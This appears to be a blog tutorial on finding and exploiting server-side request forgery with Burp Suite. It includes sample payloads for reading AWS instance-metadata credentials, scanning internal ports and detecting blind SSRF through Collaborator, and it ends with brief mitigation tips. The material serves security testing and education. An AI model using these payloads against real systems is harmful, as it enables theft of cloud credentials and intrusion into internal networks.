Exploiting SSRF Like a Pro: Real-World Attacks Using Burp Suite


Introduction to SSRF

Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make the server-side application send HTTP requests to an unintended location. This is especially dangerous because it can:

  • Interact with internal systems not directly accessible externally (e.g., 169.254.169.254 on AWS)

  • Scan internal networks

  • Access metadata endpoints

  • Chain with other vulnerabilities (e.g., RCE, privilege escalation)

Setting Up Burp Suite for SSRF Testing

  1. Configure Target Scope: Limit active scanning to target applications only.

  2. Set Up Intercept Proxy: Ensure Burp is intercepting browser traffic.

  3. Enable Burp Collaborator: Used to detect blind SSRF.

Detecting SSRF Vulnerabilities

1. Basic SSRF Test

Try injecting URLs in parameters:


POST /api/load_image HTTP/1.1

Host: victim.com

Content-Type: application/x-www-form-urlencoded


url=http://127.0.0.1:80/


Check response for:

  • Time delays

  • Reflected internal IPs

  • Connection reset or refused

2. Burp Collaborator Payloads

Inject Collaborator URLs:


url=http://<your-collaborator-id>.burpcollaborator.net


Then monitor DNS and HTTP interactions via Burp Collaborator client.

Real-World SSRF Exploitation Examples

1. AWS Metadata Service

Target URL: http://169.254.169.254/latest/meta-data/

Payload:


url=http://169.254.169.254/latest/meta-data/iam/security-credentials/


Result:
 If successful, retrieve AWS temporary credentials.

2. Internal Port Scanning

Payloads:


url=http://127.0.0.1:22/

url=http://10.0.0.1:8080/


Burp Repeater + Intruder can automate IP/port scanning.

3. Blind SSRF with Burp Collaborator

Inject:


url=http://<your-id>.burpcollaborator.net


If no direct response, but the Collaborator logs DNS/HTTP interaction, it confirms SSRF.

4. SSRF to RCE Chain

  • SSRF -> Redis/Consul/internal service

  • SSRF leads to manipulation of internal configs (e.g., change webhook endpoints)

  • Leads to Remote Code Execution (RCE)

Burp's Logger++ extension helps monitor internal traffic behavior.

Automation & Extensions

  • Authorize: Detect SSRF in AuthZ mechanisms

  • SSRFMap: Python tool to automate SSRF attacks

  • Collaborator Everywhere: Automatically adds payloads to all params

Mitigation Tips

From a developer’s perspective:

  • Whitelist external URLs

  • Disallow redirects

  • Validate and sanitize all URL inputs.

  • Use metadata v2 for cloud services like AWS.

Conclusion

SSRF is a powerful attack vector that can lead to internal reconnaissance, sensitive data exposure, or even full compromise. Using Burp Suite, researchers can craft advanced payloads, monitor responses, and detect blind SSRF using Collaborator.


Comments

Post a Comment

Popular posts from this blog

Podcast - How to Obfuscate Code and Protect Your Intellectual Property (IP) Across PHP, JavaScript, Node.js, React, Java, .NET, Android, and iOS Apps

Image
How to Obfuscate Code and Protect Your Intellectual Property (IP) Across PHP, JavaScript, Node.js, React, Java, .NET, Android, and iOS Apps   https://businesscompassllc.com/web   Code obfuscation is essential for  protecting intellectual property (IP) , preventing  reverse engineering , and  securing applications . Whether you're building a  WordPress plugin, Laravel app, React/Vue project, Spring Boot service, .NET application, or mobile app (Android/iOS) , attackers can  decompile or modify  your code if it's not properly obfuscated. This guide covers  how to obfuscate your code  across multiple platforms: PHP  (WordPress, Laravel, Joomla, Drupal, CakePHP, Symfony) Static Websites  (HTML + JavaScript) JavaScript Frameworks  (Node.js, React, Vue, Angular) Java (Spring Boot - Tomcat) .NET Applications Android Mobile Apps (Java/Kotlin) iOS Mobile Apps (Swift/Objective-C)
Read more

AWS Console Not Loading? Here’s How to Fix It Fast

Image
When the AWS Management Console refuses to load, it can be incredibly frustrating, especially when trying to deploy, debug, or manage production infrastructure. Fortunately, quick and effective fixes get you back on track. This guide outlines common causes and step-by-step solutions to resolve the issue quickly. 1. Check AWS Service Status Start by verifying if AWS itself is experiencing issues: Visit the AWS Health Dashboard to check for regional outages. Look for service-specific issues affecting IAM , EC2 , S3 , or the Console itself . Tip: Subscribe to AWS status updates on Twitter for real-time alerts. 2. Clear Browser Cache and Cookies Corrupted cache or cookies often prevent pages from rendering correctly. Steps: Open browser settings. Clear cache , cookies , and site data for aws.amazon.com . Reload the page. Try logging in using Incognito/Private Mode to rule out browser extensions interfering. 3. Try a Different Browser or Device Sometimes, browser-specific quirks b...
Read more

YouTube Channel

Follow us on X